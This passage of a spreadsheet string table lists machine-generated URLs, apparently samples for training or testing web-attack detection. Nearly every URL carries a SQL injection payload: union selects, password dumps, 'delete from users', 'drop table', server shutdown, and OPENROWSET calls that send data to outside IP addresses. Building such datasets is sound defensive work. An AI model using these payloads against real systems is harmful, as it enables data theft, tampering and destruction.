    <t>/1osytdkerl7s/jybhj1glxbowq3a.cfm?8tl=eb3m6b3t4fs&amp;ihrngjatn=tilusodeair&amp;mailvarkwifo=';+++++begin++declare++@ret+++varchar(8000)+++++set+@ret=':'++++select+++@ret=@ret+'+'+ase9vhwe+'/'+password++from+ur8f5h+++++where+sslrt&gt;@ret++select+++++@ret+as+++++ret+++into+foo++end--&amp;uasvecsht=0jtcmslq1u0hi9v&amp;.qsuz5u=ennq3ko|nmochaoeh+u&amp;ttiweahedzut9e=qrff+i</t>
  </si>
  <si>
    <t>/sh/r1/e9mehezpczpn3.yvh/euq02/lod4_m863of_grmtmee/iv.nqiuntjoro/szastee/hwxdpbdh./gqbuf/m1sform.shtml?mtmpd1v=;+select++*+++++from+++openrowset(+++'sqloledb','uid=hlenseas;pwd=cnztaa;network=dbmssocn;address=159.5.136.244,62986;','select+++++*+++from+++++2satr0g'++)&amp;fe=entoacagyi5ldcee&amp;httnooksmity8=p&gt;bhttp9r6jt3%u9a1hi&amp;dayh383tt8qmf=ks7location2;is$@body%asjx7e&amp;hgsbyn2jnf=m2ab&amp;nn1nptduut=oc.gdejv&amp;nbsr0gbne=1414577&amp;wpeiml=3328&amp;esein=ncatmrmdcres&amp;ekqxenhelgwcao=e:w8amdasafmpzhsc&amp;f9swpimgkincludenahq=winnt+4r&amp;@yr27uuv6execj=ifhoeleir9uclshtt&amp;ts8ielor7qmdmte=0vkletwakyxs&amp;gttehtafit=ora</t>
  </si>
  <si>
    <t>/le0safbreoftesiele/np@iji6uyi5f/s6teawes.js?ditb=nref0eraccess_logw&amp;ixbp4ex=138&amp;kz25ln3=idso4si&amp;yi='+++++or++'wkaesont'++++like++++'aze%&amp;mdopadeterhatr=hyw3oo</t>
  </si>
  <si>
    <t>/4drrssi/leiogoatbhsgynnaioe/qnoeiivuol8sq/esewseeeearaaeyvte/yzhxc2yyvphbhogthbvq/lndarurymq0ee.jpg?ovemtu='++union+select+++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/3osa9lyeztgie@qus/1ofphpt1u_o9dvhja/r-9ad8lnqjcuapmvc/jahhf-afjj/shulhfe/md_v9tcxequl7eobi/irfenp.rebln/j5d2bcc02dx/nas/qkgrcpsystem.jsp?r3nm='++++)++++union+all+select+++96550+from++dxnac8almo++++where+(++''+++=++++'&amp;cc=irnrvwservicesa&amp;sats0aomsew=lrizkwswchym&amp;molwedo1niet6ie=07523656&amp;bodyvarcitxwureplaced=9784839064&amp;a2c14=lomlb&amp;rhohcmvt5xes3ra=akr+5&amp;dravttnkcmo=tadk@5qnek&amp;e0tohe7hc=f77dnf&amp;fvmetav=eej&amp;re4dh=1qexw1b52l&amp;8plwmxa=6&amp;7rz8r2hwa=6dig&amp;rhcyv=]cmoterene&amp;5evartiikseseli=ifqoletf</t>
  </si>
  <si>
    <t>/cwx21n7xgctyxm/breeztslrttnaeioih/ielleo/lat1/roleswziaoe8muhex0/giptrcpa/bxeywxn_lq6s7zpkq5/aggmj/9o@cvz/0lsih2.swf?ua=ilocationotspatcaad&amp;ottti=heservicestenarohw)s&amp;5khi8=or+++++'er6dheol'+++++=+n'+'&amp;edetd=1637&amp;bueei=dqms7qiki&amp;ytttow=@n&amp;hbanme=hlo&amp;nda0zanzeolea3=sb\\enull%crr+rnvo+ioconnecteu</t>
  </si>
  <si>
    <t>/iu.js?gogm5z6kae=31&amp;_lc4s=8635604477&amp;nnechec=rhgef&amp;abqk=3668625&amp;tz=bgsoundmma+&amp;f@fn=ao+c'&amp;em=ew6svgh5n1n&amp;nc4orer=';+++++shutdown--&amp;hnnrim=bs9&amp;prru6=n=6r&amp;rymnwbos=817522&amp;kpa9.2.u0w=vacavld6$&amp;bdthtijed=nr@usdz</t>
  </si>
  <si>
    <t>/lu80psbbd7ej/fdkwmsvbodyxlogx/bl.jpeg?sajq=9550636&amp;latj=e)ut&amp;swnfor816v='+++union+select+++++@@version,1,1,1--&amp;gies0nit=5tts0d+i9gchoq|&amp;i3nw=3140</t>
  </si>
  <si>
    <t>/hh9rsloaylirlas9i/m7/eit9/nautr/4sc2ds/iqq2up6fdkaw6gz@uxjr.gif?ct5u3cryeaaq=amey'/**/union/**/select/**/hr/**/from/**/dba_users/**/where/**/mlsos/**/like/**/'%&amp;ass4sd=nqhdw</t>
  </si>
  <si>
    <t>/gryew/nwkny8/ntzbuim3lt/tr/2begcnf/tomnilaeu.nsf?t5ict5bycmoeuuo=t:es&amp;eqtentmfte=4&amp;etrjo=c&amp;gh8g3iig=';++++begin+declare++++@ret+varchar(8000)++++set+@ret=':'++select++++@ret=@ret+'++++'+ih+'/'+password++from++++enu3jt+++where+++sg&gt;@ret+++++select+@ret++++as++++ret+++++into+foo+++end--&amp;1nkc=538</t>
  </si>
  <si>
    <t>/ureplacereplaceight/eio.ceycw-/rprd1jbh5@_ml5gp/etr.5g-dcabfeur/qxehni07gobytsedt/cei2bstsoria0rxerel/libnwgetatm.2@edocument.php?at='+++or++++'6osd'++++like+++'aze%&amp;trs=u+t3e</t>
  </si>
  <si>
    <t>/ayi/baheedeaee0/frommke6eegxyautoexecla/deloadfemaiiaerf1h/ovxzpkx8pi/twilttzjhpnsxhem/zchildt/nhplctm9mrzaa5fgon.swf?hrtecr6rsp5qii=64833&amp;pyqe52aqs=casurwyotu5a9&amp;ivenetpm46styie=5eg@t&amp;ynyhcscriptxdh4is=736082&amp;dsu4ntodoahco=759357839&amp;lbau=a+h&amp;dielweat=o&amp;t3h1h0i=7979527&amp;phpxh5x=743571&amp;zxp0d-vr1o8='select+++++customer_phone+++++'||'from+++++customers+++'||'where++customer_surname='''||+++++lv_surname||'''+and+++++customer_type=1';&amp;eaelwcitypmn=220599421&amp;hg5rt4r3triqt=negtxfi&amp;6ed1d0=ain9e-ei~2&amp;mmfry-raaccess_logg=oqsa</t>
  </si>
  <si>
    <t>/icmrweeoctqtae1d/thtr/tgiv/pn5ontefcc/xos8eihm/itsod73ersyocoempel/kklmvo/hciinow/ooizrlte9r9oe/efenpnj3/bf0spiw7.png?teene6amccrshl=1430&amp;t2zshitasueiueo=ae@sepetdl&amp;ynfe=92922&amp;inu='+++)+++++union+++++all++select+++++rmrt+++++from+++rdefoeiwp++++where+(++++''+++='&amp;tepmgbtlp4eh=sihue&amp;.nlinkbsgdvcc=81524837&amp;f3k6mjj1q=sa@zgj_eana-</t>
  </si>
  <si>
    <t>/ao7awcexecq33-/pe/imwbywh3d@0b-t/tu9dyq_sqd/2gafxsa/ll2r.9_q/9ezbcketcfy/mh.cfm?ujtgi=4255&amp;cmnoe=ncd&amp;ui=sv9&amp;grrln3=iwphs&amp;la=;+exec(+'ins'+'ert++into+++users++++values(83,'eopeyv','anthe7ic'++++))&amp;r7d0uaoeaheaiou=onmgn</t>
  </si>
  <si>
    <t>/haentoraseit0/ljxwvbe-ph/nf7mif2hkiimiesraog/tl.lyosdl/esrhd/su4/gncpnateungtaydra/lumgyml3re0np/e8pe99bkl3bkfwrp4s/oqvc.jsp?qecnzieyn=;+++exec(++'ins'+'ert+++into++users+values(1413,'edneowini','qcewtearrt'+))&amp;rearhtpxele=d&amp;euet=)b&amp;6ogsemtn=124868503</t>
  </si>
  <si>
    <t>/ldbhkbh4ju_/2ct/7.o/atqtdcl/nxix8bdt.jpg?uga6gaattnhp=servicesktnetcat&amp;daisdiqccqb6='++++or+++'cnlnctdrpao'+=+++'+++&amp;ckexecrhallar5=ieeain++xsystempr&amp;yno7e=nco65&amp;4poe=964&amp;hezbti5ynt=ledisyia2ax83&amp;oe=@&amp;vetaieet=wohrfneitdb5anmt&amp;oesuq=uhot6rwinntmf</t>
  </si>
  <si>
    <t>/uxmoreplace.msf?eratojchb=i.4iamr3vlt&amp;dchalaeoeng=nik2hk.aojn&amp;eubnlragtoe=5708&amp;tti8ey63eyk=iet3&amp;r9casdabstdbn='++++group++++by+++users.id++having+++1368=1368</t>
  </si>
  <si>
    <t>/es/5di9/s1z6zr-ym8sfa.z.aigs/oykzlzntjrv3aafq.gc/dm/eeetashrdns1tp5tsnr/ly5ne-o7k3xrfcgcm6/kw@/i-5krqtq_bvfpni8j/qke6poehneogu.39a/y24gqhhtacces.pl?eurulr=07237758&amp;htaoliigca=lddoe&amp;hm1ai6=-sedhdev&amp;ob__uniongvmebj=520077&amp;ecdhatna9h='++++);+++delete+++from+users;+++commit;++++dummy(++++'&amp;pey1ta=&lt;ostdin+''bnktusw&amp;hx7obtrma=tt&amp;aue6lwedz=m(prlnao&amp;bjcfmrghaua=hhtivtkoz&amp;enn3fshlarosge=saa&amp;evretcr=$chin&amp;oheyneai1si=69064&amp;lsristsin3tn=ngzeou2eoeeha</t>
  </si>
  <si>
    <t>/sxuaatwy8yid5t/libukxmlpwq/8lry/e1ejea6eo9xk/v88i/es_t.s8rgnus3j/mb/otcwcterbrs/@e_/ld1t/wgoloj.aspx?mfapa=858&amp;htncbcu=e+eha&amp;elafsewhihhevr1=meta&amp;scliinputyu=0&amp;oaot=buao6ocksnrz&amp;nuunp=iwvz-sb&amp;oc=a+y&amp;zroekhrjciw=or+'mlgoo'++=+++++n'+++++'&amp;rjw_iframezpbr=aheoi&amp;earifd=n4_shi&amp;jd2czxmltkkgnp=accept+4regall@13pt5ttnson&amp;jztea3.=nph-insert&amp;tmt3eoocrmwsh=oe++</t>
  </si>
  <si>
    <t>/eefgpqgrkiwu3r_rivu/asfgoat8.png?tnniekw4aerd=49&amp;ontsathemuee0=;+++++insert++into+++openrowset(++++'sqloledb','uid=idaitihshn;pwd=1iithatr8;network=dbmssocn;address=80.85.37.180,1433;','select++*+from++++_sysdatabases'++++);++select++++*+++from+++linkedorremotesrv1.master.dbo.sysdatabases&amp;qcrerbut1r=5952&amp;tgeti6hr=wm7d6qz</t>
  </si>
  <si>
    <t>/1u83/d-9v.jkcrs/ablryqxs/2jijobnfm/7a7ttcacfsio2ado5dmh/e0pqewo/sx.e/jpef/cm1eein4yerrgspbvn.bin?dera0oe=eh&amp;positionngq=yait&amp;pf@xzp.hw=det5&amp;rr4ittr=++++or++++2+&gt;+++1&amp;lwzil=pnnntddych4knd&amp;ht9ha=pssmtr@wheredag0+&amp;ndpiojheooy=)d&amp;tcacceptcgt=fn3b9rsepnnt3sne&amp;t9=8o</t>
  </si>
  <si>
    <t>/%ua@w@i71q5dconnect/ie4jb8/l_hay02@m9hyg.tiff?sv1qqy=tb.@e1v&amp;o7noiti4si=5184584&amp;ometyuex=rd@7cxsazqq&amp;nposxexp7u=ett&amp;ywexecunionh=;+++++select++*++from+openrowset(+++'sqloledb','uid=tiowath;pwd=smmerl;network=dbmssocn;address=145.76.64.232,68505;','select++*+++++from+++++rrehinxqad')&amp;6hforgvrn6=723&amp;patnez=29&amp;rye=[ae&amp;dcxhnhaaolcnr=f</t>
  </si>
  <si>
    <t>/eznjeen1/zy4_ia/cp8ax@fe/doaoltysemlnbi/uc@gkl/tp-syym8nlxxcn.php3?entniktastfz9ri=or+831829748921=831829748921</t>
  </si>
  <si>
    <t>/opendr/w9gxvjrbn_ggnmr/onrnghgx9heau/gspbtk6sotnzv.5lzp/meuaelssl/so9wvikqo0/atlb1u4bf5hrzcrno/2wrdsenen0o/kafot/faei2lgsytokeii/oimvasn.mspx?yefbunt0td7eetr=8421319&amp;o55tnus9lstttl=ntitsi\\h&amp;&amp;4tuibhva=blip1l&amp;uv9irnrlrnietxa=dbp5wgwl&amp;ja.n2oyzh9=or+++++'ooeerer'++++like++'sim%'&amp;aa5hlizm6to=9542&amp;ptqtesyy2thtsmp=es6kr4tsoiyeo7ebe&amp;fnitnhd=eewznocw7b&amp;sv0ss6zocphpiq=en(&amp;fegeikiaer5e=wey+tmp&amp;luabzrhihhw=rt0siq&amp;ayywmiaesnohllt=106&amp;eatcieet=eef%emodohichildyad</t>
  </si>
  <si>
    <t>/st/65hcaor/stbf/na0xttify8hiseew/qbq3f/g2m1h/xedcfu5@6k7i3m.asp?s2ett9=646475&amp;h7otyx5e=origtext'or'wvfwrt'+++=+++'eats'&amp;si3dhamtaeebi=12</t>
  </si>
  <si>
    <t>/gtzbepldesyf9s/jpf2qwtglq/kxfmuatucc/pv./nixuyxkeqw/thn0m/wiwdeuirrpa2oa/x3/admindropxjbusr1jofbtb/fiov/n6.css?sas4no7ne='++++)+++union+all+select+++2+++from++tcivurb+++where+++(++++''+=+'&amp;io5gooo4rrsn=:1binsertteta+htaccesyso&amp;waxtermvar=rsw@h3rk6p&amp;2whxmla=o&lt;location&amp;mg=ntke9</t>
  </si>
  <si>
    <t>/ieh/gw2hb/md2/tlurerua0cari0edo/anwsonre1/yiegswsyihpsa62bu1/tcavz_yv/yi.css?edcrskeh8l='+++)+union+++++all+++++select++wa4+++++,+++eoe+++,+++eisd961++from+islhetaeex+where++++6i0a6+++++not++++in++(++++'id9iatotld'+++)+++and+maueumum2v++++not+++in+++(++++'ojo')+++++and++++''++++=+'&amp;heighrrd=t227krj7h&amp;buob4=uvp34nvfsu3&amp;bsl8eeo=h+t&amp;sm=0mocha&amp;jmoai=h</t>
  </si>
  <si>
    <t>/awoe2nnrdde78nntvid/nd0xwjvxnzzfvmmfnz/aw_cf6v1fghnv/hgswesltebueg0/odtf3vrw7yz_kea.llt/hivfrbp2uqry/4tweu0sunesato/dqqbe1/eanhehgng9magyoilt/hfn7aiihslhatknandg.html?lalnyusc=or+++'9ct'+++++=++'++'</t>
  </si>
  <si>
    <t>/bitinsertyoqhdall0wl.g/craee5wledfzhiwo/iacyntaoctrodui/pbtkna/dc0yxzm/rj9hpdwrfgez/ddtuovo/tq.html?9shrkreytsrma='select+++++customer_phone+++'||'from++customers+'||'where++++customer_surname='''||++++lv_surname||'''++and++++customer_type=1';&amp;oestnrsjmev=63s0a</t>
  </si>
  <si>
    <t>/pyiowj/hbesmce_l2/knonucu/k41snjaswxe/opbkm.gif?u1=++[t+lesae&amp;ruioci=prmtab=hs+m&amp;mekmea=tbiz&amp;afulemonose9eg=25815&amp;ia=select+bbvrda+++++from+all_users&amp;msknyacee2bw=rfh_7qwbi&amp;26eya=23520&amp;hnh9uitgosc7=e0a?ri0</t>
  </si>
  <si>
    <t>/tiakl5yzihrbx9zsw9i/scevaa/pnlscriptoservices/5ps/n9qc@y.ndwkkdp335dl/09kc/6zz8pn5nvhcaty.jpg?ngetcw=d9r&amp;efezvmv=2&amp;hzc3me@g4gl=h4oj&amp;ufgwttf=eucsoodo&amp;axaazyvhpwp=au&amp;tmrathsnd=385506&amp;wdkdhw=;+++exec+get_cust(+'x''++++union++select++++object_name,object_type,''x''+++++from++user_objects+++++where+''ie8awhi''+++=++''++'+);&amp;eeilcxgedum=kgiwariup&amp;fmhnrcp0h3apositionk=a9moeoea&amp;ap=ah&amp;aene1ao=-spv3niinputoascript</t>
  </si>
  <si>
    <t>/n63stj/2bwj7zrsnstyle/hasfwhmnrkuy/54despi/sypsecseez/nukdzwqhzgreyloc@hrm/1ee1raemsoadidzr/rot/c6b_y0eallnu/l18gwuyqi7hlsxmd88/eppgmkb1eexjmhtk@..htm?3fgx=ctoz&amp;nutss=mhetshsgaefpdjz4y&amp;eiszaatlf=27&amp;cp8r8npy=t4jzu8lk&amp;kea=rat1_l&amp;de=nu&amp;'\\sosen(&amp;zihrm=3352&amp;vinitlzni0l=omqh&amp;2y-p2=635137&amp;zexecekz=tweai2msws&amp;tshjkotsurss=allatmc&gt;yevsock_streamnxt&amp;be=863699&amp;tnyothyetia=faputle'3nn&amp;htr='+and++++user_name()='coe</t>
  </si>
  <si>
    <t>/soynqzaodeanda/@2fxcn/s6tvwfjpabrw/iuy/yh6umeuvhlmtmahsrbo/tbopskmifhvnq9pgz-/p.gtisa1z-gb3i_3lcn/dtuee0hlmu2lmt4.tiff?xjqx4as=omiwcakx&amp;dhn=uqmy'++);deletefromuserswhereupper(username)++++=upper(++'admin&amp;htrncclxfd9tir=+?&amp;g4ziestdin=withtpassnsdnvcmg&amp;eq9c90kldeletenog=1851&amp;eezke2=ohl9eelot&amp;ftrl=954&amp;soen=rw+&amp;w9f3pr=eshs</t>
  </si>
  <si>
    <t>/za/1fubw/ezvry0s8l4eqw8ssfn.htm?f0se=tqtaia&amp;cdemrscrossla=3roejgeyltoenm&amp;includefq4lemf9d9z=ehzn8nwvw&amp;2ecohd='++++or+++++'it'+++=+++++'ot'+'4akod'&amp;a1tovndter5=4272577619&amp;ag=lounionmts0oo/eewhiuyr&amp;servicesm-vyc=shutdownmtn(r:d:&amp;eeriheiah3far=hsier&amp;lxkaf=725&amp;ktleke05is=ey\\5beduht&amp;rnzmteg=rmiac&amp;uddpmemehelrn=d&amp;ung0feuzv@=bnqos&amp;tiscuwwvrns=i</t>
  </si>
  <si>
    <t>/ij_grnu/husecuh37nptdodoun/bbigatlatl/qw/d_x2uoxbb@htkb/spnsfxhvnc@mzwclh/2anwucos.jpeg?cudltnttqcmjft=unrd+passthruhu&amp;eip=00083808&amp;eoin=mrit9a0eh2s&amp;ehcnzeetnhieu=953735071&amp;oraitto4t9='union+select+password+from++++dba_password;--&amp;n@ej=5612&amp;iyteygypsot=jlsa]+aaccess_logbinobject&amp;euy=amegp&amp;ne9=jihhnxr0a</t>
  </si>
  <si>
    <t>/lmax/2.db_lmfprpe0_.exe?dn0oe=eptsrqeee72&amp;iuos4soeret=e1a&amp;fne='++++++++++(+++++select+top++1++oe+from+++eieb)++++++++++'&amp;zhtg=5gcaaatg&amp;tulb8t=sheja&amp;s0emde=n_umstijhq&amp;rtegmt=erj&amp;havinglogcnullm=vorc&amp;lw4n3ya=esteacefehe;o&amp;47do6=a;u]&amp;tlrqerkqun0o=6191039465</t>
  </si>
  <si>
    <t>/as/lcjxeezhc/hshinrhcs/yassgtr6tnw/.pds.llsmcz9-6e/aincludewwysn686@-myo/4@zxl/vqsjddsrfl/lwviamii/atimtc4a.jpeg?sa=ehqusworituwto&amp;gvbscriptumtf-l=zx0eszs4aelmew&amp;erydiinrixdth=7354109&amp;.g.cthttp9inserte='+++++union+select+@@version,1,1,1--&amp;vise9ess=yrnat</t>
  </si>
  <si>
    <t>/etei/s_aoxg58o5.html?6rnotea3o=mi&amp;bgsound-0tp=or+'ibeeb8evl'++++in++(+++'+++'+++)&amp;ad=8716&amp;og1cig952ksirai=167137&amp;e8eeueteq=227886&amp;asfarrt=721</t>
  </si>
  <si>
    <t>/sro/roqcc9fvatqu9am9ydm/mo2yheiiraicse/tpg1oandpsqe4ihse/sn@178.t/usf.qi4vx/axdiiq2h/giouocsxieaa/ug0finvf.a..fcazkjp/5dh_4ordxvvl/a3e9fnitddeuoadmls8e.jpg?aguvbscripth=uamkssql3m&amp;jtsrwae8=';++drop+table++htmiuuas&amp;pd9ohaving=eagnl&amp;fservicesjsh48eml.=gfgdl2w1&amp;pv=ynd&amp;4t7hbgsoundw8=6654678</t>
  </si>
  <si>
    <t>/eemhphseawrwnderirs/oltniudprat3tlirn2i/icoo8auiv41id8bddp/w2wvrhgolkqom/zka6oatydm_t/e@9vo/wekpng6vsrbhtpassi.asp?ea=137&amp;skino1n7tsr5=0neegavary1dcntbiha+connecto&amp;ig=sn2esontdo'+++);++++delete+++++from++users+where++upper(username)++=++++upper('admin&amp;6hiiohdwtonh8af=tm&amp;smoafuoeumbgx=51702</t>
  </si>
  <si>
    <t>/buletabirtwalagsr1in/nh16/lokybnedrp2g/hnb9zxobxoa/sns/rsk_limdyisrpzg1qdk/xnsartsonet/agvehe8gdv/uqlv5/elge5esrwunuauhriins.bin?rteewf0xiqeab=046472&amp;deneassat7efart=')+union+++all++select+++++97,20,847,6,6+++++from+ia+++++where++++(++++''++=+++'</t>
  </si>
  <si>
    <t>/eltf/ahtftif9ppnpoho/oidw3eb0rft/tcx.24/e4ece/o8n841snrwvi/rrx3c8gtkwzl.swf?mf=10&amp;buoericor5l=708838190&amp;0_zvjqpq8i=ma7sab15rltaeh2&amp;sltae=g1dsws/sohe&amp;ush15n=be8uuewinnttmxt&amp;yalro=230&amp;niaieohyrsof7=suajj07f&amp;el=kiscript&amp;ohcma=ibe'ntupdateetnac7axmlleg&amp;enaa='+++++or+'ealh28hoo00s'++like++++'aze%</t>
  </si>
  <si>
    <t>/rtjylhd3khrpsuk2qo/sktbns/bee/tutce7ckih1/r2/irt.execiz/fnto2ilrintsamrtrt8.pl?ieeebon=napy_vwpx&amp;t6s=irpassthruzs&amp;citi=rooiqf&amp;gna=or+++++'ns2ren'++=++n'++'&amp;.isluthttpmailo0=cndelete</t>
  </si>
  <si>
    <t>/fpw.cw/3anne/yx0.ac/ptrtt6utpot-_pdf9t/avk_wwh/rz8j-@ucug2glb5qed.t/s2ao83/hoyeem-icf_8p.6f1.msf?hqiejlike.n=cnbj&amp;9lff6qu=rraor&amp;ehlnebde=iiprid_&amp;syin8lmlre=169025&amp;umgeuxortaqvc=';++shutdown--</t>
  </si>
  <si>
    <t>/p1o/yt3rj7m-dd-r/rp/np7/vaiooqt/5eaa/deleteersz-kqtscriptxyjj.jpg?o4nnna1t=agn2izalboh6&amp;pselectgysy=cpositiont&amp;relgg6rmesnmhu=cpm4orrvmd&amp;eri=taetgcxst&amp;ehwarysy=801629&amp;4eeneeti19=hmailn&amp;4igireso=0678112&amp;xcomnf5trbd=exheotpht&amp;iaeihvnenjhqctu='++++or++++''++++=++'&amp;smlgsuidotrafvw=tt3-&amp;yhrwpahdaua=cn7s1bxz&amp;atsbihb=7&amp;tfise=080935&amp;q13m2bsboe.=5311358560</t>
  </si>
  <si>
    <t>/el4ubrc/xin0oehufx22.mdb?air1etdco=83875857&amp;oastet2hgdey=3uehjxq1&amp;0tthni=6i'++union++/**/+++select++fadeobinha++from+++++dba_users++++where+++++4t++++like+++'%&amp;osclcloisqhnehe=cncecotsaapiaaetx&amp;ldxesiubhil=juo:s&amp;-a8mjdivrd=m8ocat7havingqnwinnt+a?xr4en&amp;ekw9ne1=nsojomsi</t>
  </si>
  <si>
    <t>/2.4p/egdqconpitdqidmoaopt.tiff?rei=wvj3c.t.&amp;tesitole8e=getetlm&amp;.b2wwfzsenhy=3e6ohhcogom/rnl&lt;like&amp;oglaa=nsjs&amp;msqgvpsd=ye+da1npassthrushutdownnhed4a~hbetweenys&amp;anr3t=aetnhtacceswaremndi&amp;zgfnode@b.xmlg2qs='++++)/**/unionall/**/select/**/0/**/from/**/sy2w/**/where/**/(++++''+='++/**/&amp;muyieiestttiac2=0&amp;bioisoianecib=hcxth&amp;_-1udbyl=se&amp;dirunrrdp=djeeuuroaht&amp;itiioaabpas7=62&amp;glromai9lis=adv</t>
  </si>
  <si>
    <t>/mskqc1zhjdxaeqs/ste6/eaxevyre/uk.bflsheurmf/yfqi7ceaiallmdlootav/damsg/une/elqxehbsobgs79lz-1u/txchquiap8.shtml?ltmy=9&amp;gliybd1n5hdnkos=sn13gv&amp;82ipiie=363683999&amp;xtbetweenedb=ar&amp;hpner3fso9k=12740946&amp;bwghehtl5=eemw&amp;drsndlidedcdnan=s0ixfrn2');+++delete+++++from+users+where+++++upper(username)++++=+++++upper(+'admin&amp;mrqscr9id4gatv=7637&amp;skrs=e1imhhun91q8&amp;fnmfhjti=3ta&gt;;&amp;rs0bnneet8=vamahcialonlfeotn</t>
  </si>
  <si>
    <t>/rio3fepi1hiy/eaea24a1xtcsf/bchtbzadudto/tig4na2fpwdf_bfvxit9/xmetc.jsp?si=arard7etcdguzsmc&amp;unrnyg5ee=fexdl9zhe7&amp;atisee=013754&amp;3qs8erh9h0gnxni=usrexecpnba&amp;rqhgxghhpwn=cadiltsyadsd&amp;rfniefloen56=ta-hgroup+by&amp;rdvokorhebf2=idafu&amp;beualradns=eavqsekh&amp;ewasbdolqnhrgi=el&amp;mrsmalaadk2hn=jj0az4qrpv&amp;tte9soltroeissl=207&amp;le=12501256&amp;rqmd82r8t='++++or++'s'=+++'+++</t>
  </si>
  <si>
    <t>/emcl-86lxec/or4_y30_44.xjae.tiff?6om4rie=or+++++'eseselk6'+++between++'r'+++and+'t'</t>
  </si>
  <si>
    <t>/ccqservicesrlninncphpp/nsc4rbrelsr7@dj/1n.jpeg?ez=tg11av3.vwsv&amp;gunncoeg9enc=vm&amp;hj6gmetaxlqbxl=nsor=&amp;eqtpastaoxiltoo=orth+&amp;thsndds='++++(+++++select++top+++++1+eoti+++++from+++no)++++++++'&amp;ldieceym=/e&amp;e-sx1man1position=vnhwtdlt&amp;pwio5fd9in=se8&amp;hhf1=0&amp;naeaeaxtonuo0y=&gt;ydbpfnednigs&amp;y9qjljlnf5rps=3recrsaidhmn2s&amp;decn1=659743&amp;6nsgxkrae=r6zauqp&amp;qpgaoalyn=1y@</t>
  </si>
  <si>
    <t>/resvaadhmq8ur/eokyaa3lnpottohoe8pe/cewagel/rxxwfgk-ysqpzvl1n4il/am9ug2_/ptw/cirutrttle6ytteloww/le26teoaog.jpg?lscrshtpassj4v=lhtscbawotfoe&amp;3tm0aitwm6wee=8800&amp;5eyh=0dx&amp;to='++or++++'1teerm9dil'+++++&lt;++++'x&amp;nntsor5eedina=yha</t>
  </si>
  <si>
    <t>/ntndyagledczjs3e/ad/jw4e3b.g.nsf?wlmgrvlg=9xmlyen&amp;dggti1ldesdia=9100589&amp;hyttsierhr=srexecrept7rm7ot&amp;olirreg=i9zaz5&amp;w9etpncfa=n21h&amp;n_lzzhsl=hvfnpgaz1bd&amp;arlscript=6u'sz&amp;nsimeawkhit3un8='+);++delete+++from+++users;+++++commit;++++dummy('&amp;.c0tq9w1yp-=tiw&amp;0ot=2c&amp;sa3icsa4soeh=ihdf&amp;dl=mhy&amp;eserrereec=atv&amp;7tuhnenn=5unal1qtes2rslc&amp;ezp=e&gt;6zds+$</t>
  </si>
  <si>
    <t>/@_nr_divtf73/tvm.3hkhj5/xeotsojiirtuubathogl/hdibdchgolocationmhn/uhkypfxv/hnu.zzyjxkautoexecw_./dqgroupbyneekaejufoy/gooz6nheca/qa33b/wtofdp/opqservicesou6/thgswsetdjc.tiff?vraewhtes=himo&amp;8cao0j1e=0516454254&amp;pesnctast=154&amp;s2s0odo7e5hno='+)+++++union+++++all+select+85op+,+mss++,+++++63td+++++from+++di++++where+sitf+++++not+++in++('na4ic'++)++++and++mito+not+++in++(++'n4nns0rnl'+)+and+++++''=++'&amp;mdagtnaiharyd=yr&amp;f6lecreuah=eselectt&amp;oa6wqw=ats9mtawlywyr&amp;sfn=2ifonp&amp;hrmei8rdamlsw2d=owshuhu&amp;crnplpfspou=tusnn&amp;motaronaenlhq=2928&amp;cswthtib4llej=iefc-a]telnetmphttpsdtu&amp;e1eaee=ai2ucsueostm&amp;tpniaow4y=a8lbvt0-kkn</t>
  </si>
  <si>
    <t>/wpqq30/sdgfuedadcyhnhb7/autoexec1.jpeg?1enc='++)+union+++all+++++select+7is9ne+++++from++++ni2taln+++where+++++(''++=+'&amp;sds0dyall=96798187&amp;ihcacfgselecte=aioani&amp;o16f=sigrdosoaraqe&amp;ezgnre4itebmt2u=xp_tk&amp;aselectrd+mwe+ifnnf&amp;includeezma2lxg=sjx&amp;uh5iy=64490538&amp;octd6=l7rmneioankhnai&amp;morseaellrtnsie=echohb&amp;&amp;euerverqa=l3i+ao&amp;ocktstdco9tbu=e41cynn/t:]</t>
  </si>
  <si>
    <t>/b0ntttedrttaih/ihuiy8/oz621so5yehnx./rrh8/aqh7@c6tirw.-uqz/tj.tiff?nsifavnfs0=and+ascii(lower(substring((select+top++1+++sq+++from++++sysobject+++++where+++++xtype++++=+++'u'++++),1,1)))+++++&gt;+++111&amp;tsyszbe2tt=00884&amp;meuuzme3hucurii=53020000&amp;esdmtl=x@cj8q&amp;connectevaluh=07099670&amp;ar=cebmuih&gt;cee&amp;ntnoetlye=l4aiye%&amp;sdlumoespitge3t=834&amp;7n0m=x9-</t>
  </si>
  <si>
    <t>/zoedpbxrxclgd.iryd1/drnvonh/nluu/sfovt5cfw/sntdsen/ulsozjobjectui5m/x6bax7lz/qw.html?adh=pt&amp;orielnon49era=hooihtnrroor5ewhs&amp;erf=528&amp;eer=982&amp;o7avb65bsenaat=&amp;oait&amp;jrnuteesefr=dawynhhb&amp;lmpouiystn=97842&amp;1enmoqgtcbrfos='+or+++++id++in+++++(+++select++++*++from+++++++user_db++)&amp;fhe=onc9rltb&amp;gts3=e)be3yoobjectpu&amp;t9hxehesnyae=inaox&amp;ntmyaheazs=piadmin&amp;hoaus3sb=y&amp;els=eamxp_stles@</t>
  </si>
  <si>
    <t>/tqf41edrwanq./seg@@phol-byr3ce7/t6/st.ial/aisliytc.nsf?joaio=lehxrdecta+&amp;lrsmaiosxpi=fq&amp;uhbbrs6z43=93&amp;sbla6zlfmosctes=ncv&amp;ue=dhhat&amp;5hn=ennqarwykq7w&amp;_xv2llik=';+++begin++++declare+++@ret++++varchar(8000)++set++++@ret=':'+select+++@ret=@ret+'+++'+sl6nnhi+'/'+password+++++from+fna+++where+892hin&gt;@ret+++++select+++@ret+++++as++ret++into++++foo+++++end--</t>
  </si>
  <si>
    <t>/hsmspxealrhiserlma/ewspz2_ncrildmtu1/rsovivcatmaac/nfnncveppv3.dll?ypj@afi=oo25b1qqe&amp;ewziu5ia8ehto=++or+++++2+++&gt;++1</t>
  </si>
  <si>
    <t>/qjiz/6@po/dunnhvhenlsralaot8/jtsdoos4qfrtn/08idael4haratxonlb/eclihrln1v/f9dmiqmsn_tdr9https.jpeg?whuhebarsnw='+++++(+select+++++top++1+++rl+++from+thyaryp)++++++'&amp;vpddglz=2512624&amp;ueso82=xohv0ju&amp;src485ht=862&amp;rrensc=470</t>
  </si>
  <si>
